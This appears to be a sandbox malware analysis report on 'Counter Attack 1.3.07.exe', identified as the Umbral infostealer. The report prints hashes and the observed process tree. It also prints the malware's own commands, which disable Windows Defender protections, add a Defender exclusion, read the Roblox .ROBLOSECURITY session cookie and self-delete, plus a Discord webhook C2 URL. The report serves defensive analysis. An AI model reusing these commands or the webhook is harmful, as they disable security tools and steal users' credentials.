Overview

overview

10

Static

static

10

Counter At...07.exe

windows7-x64

10

Counter At...07.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    270s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    09-01-2025 16:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Counter Attack 1.3.07.exe

  • Size

    4.0MB

  • MD5

    768fac5fc9b1a6723ec5e88643cfa69b

  • SHA1

    ecadbe36d1526e2564eda430956b23d41b08e41a

  • SHA256

    98d6a942ccc041bb0534b401fef09d82b4d2a4690673c325217457e625e6259b

  • SHA512

    e4219e87335cccf156828c9271b6e619fc2f3ad848eb3a82ddc683679efb86e4575b2c0325ede1f3a06a533cb5bbdce75bd227ff46ee309902ba7e1554411690

  • SSDEEP

    49152:NNEVtO1U1y1DDDDDD7Llngq7NNMqU0p2Vhk9aQNEVtO1U1y1DDDDDD7Llngq7NN0:NNEVJyZlng4p2VeNEVJyZlng4p2VMg

Score
10/10
umbraldiscoveryexecutionspywarestealer

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1326955608112496710/UQehMk_daQ2YbkYBZ11umbBWXbi1b3G49GJ1zVYdBwPGpiZwYf8UJiTlt6xSrBCEwhJ_

Signatures

  • Detect Umbral payload 3 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 58 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\Counter Attack 1.3.07.exe
    "C:\Users\Admin\AppData\Local\Temp\Counter Attack 1.3.07.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2908
    • C:\Users\Admin\AppData\Local\Temp\Counter Attack 1.3.071.exe
      "C:\Users\Admin\AppData\Local\Temp\Counter Attack 1.3.071.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2808
      • C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2876
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2876 -s 1088
          4⤵
            PID:2872
      • C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2944
      • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        2⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2708
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2188
        • C:\Windows\system32\attrib.exe
          "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
          3⤵
          • Views/modifies file attributes
          PID:1728
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3048
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2924
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2252
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2424
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" os get Caption
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2288
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          3⤵
            PID:1180
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            3⤵
              PID:2068
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1568
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic" path win32_VideoController get name
              3⤵
              • Detects videocard installed
              PID:1200
            • C:\Windows\system32\cmd.exe
              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
              3⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Suspicious use of WriteProcessMemory
              PID:1888
              • C:\Windows\system32\PING.EXE
                ping localhost
                4⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:608
        • C:\Windows\system32\taskmgr.exe
          "C:\Windows\system32\taskmgr.exe" /4
          1⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:1628

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
          Filesize

          1.9MB

          MD5

          ec801a7d4b72a288ec6c207bb9ff0131

          SHA1

          32eec2ae1f9e201516fa7fcdc16c4928f7997561

          SHA256

          b65f40618f584303ca0bcf9b5f88c233cc4237699c0c4bf40ba8facbe8195a46

          SHA512

          a07dd5e8241de73ce65ff8d74acef4942b85fc45cf6a7baafd3c0f9d330b08e7412f2023ba667e99b40e732a65e8fb4389f7fe73c7b6256ca71e63afe46cdcac

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7CCSURSTQHEX9GF7P1Y7.temp
          Filesize

          7KB

          MD5

          03dc7d88b006884df4b63290b7a3aaab

          SHA1

          ad78ecbf31423e725903038271b55c3aa5de0d4a

          SHA256

          df393c359cde0aaa293177c4dac2c152f9430102a6b2e7cc9fcc6d7826d13866

          SHA512

          c93309a1712a615a61f8c9be00ff5856b34824895706727abbf61afbe50dd8227d4ca5b49be2acd2d8042ccbf50c3a8c6f6ea0e34f5a8f4dd54a2049d5a71f76

          Download Submit

        • \Users\Admin\AppData\Local\Temp\Counter Attack 1.3.071.exe
          Filesize

          1.9MB

          MD5

          69bead9cc091be0dffb03708ee18466c

          SHA1

          5c4940dddd513a8f75745d63f21fe53d9b22de49

          SHA256

          3e23ae22cb0d4e7ba836cc3f26ad73a51ff9c2987944f08c6120aeefc608d69b

          SHA512

          03ef8a187c7dd31979728d4a1fd544998f756df9f4af1e64d743f56ca42be648feac440246ff280cb7935cec2b5ecd500b2be69da47d6c598f3434f4c47a5f65

          Download Submit

        • \Users\Admin\AppData\Local\Temp\Umbral.exe
          Filesize

          231KB

          MD5

          69ac49033ce70c49a4615c5f32d3786e

          SHA1

          e8088b02cf9c84c027854bf0a8c042764a53ee07

          SHA256

          a233572b6ff043e804d6f2b8fb8e3a076d0e6558e723ad9d2a64e8811e129605

          SHA512

          5456504e8e85afdb6a65570890440f85be458fceaf1c5831c3a5669335170ca290809d7741550377e2bb22c4e7b73828886757149158fb152d4be1a6051787a3

          Download Submit

        • memory/1568-70-0x0000000002790000-0x0000000002798000-memory.dmp

          Filesize

          32KB

          Download

        • memory/1628-78-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

          Download

        • memory/1628-77-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

          Download

        • memory/1628-76-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

          Download

        • memory/1628-75-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

          Download

        • memory/2708-25-0x00000000012E0000-0x0000000001320000-memory.dmp

          Filesize

          256KB

          Download

        • memory/2808-16-0x0000000000400000-0x00000000005EC000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/2876-26-0x0000000001170000-0x0000000001356000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/2908-22-0x0000000000400000-0x0000000000809000-memory.dmp

          Filesize

          4.0MB

          Download

        • memory/2924-40-0x0000000001D20000-0x0000000001D28000-memory.dmp

          Filesize

          32KB

          Download

        • memory/2924-39-0x000000001B700000-0x000000001B9E2000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/3048-33-0x0000000001F50000-0x0000000001F58000-memory.dmp

          Filesize

          32KB

          Download

        • memory/3048-32-0x000000001B670000-0x000000001B952000-memory.dmp

          Filesize

          2.9MB

          Download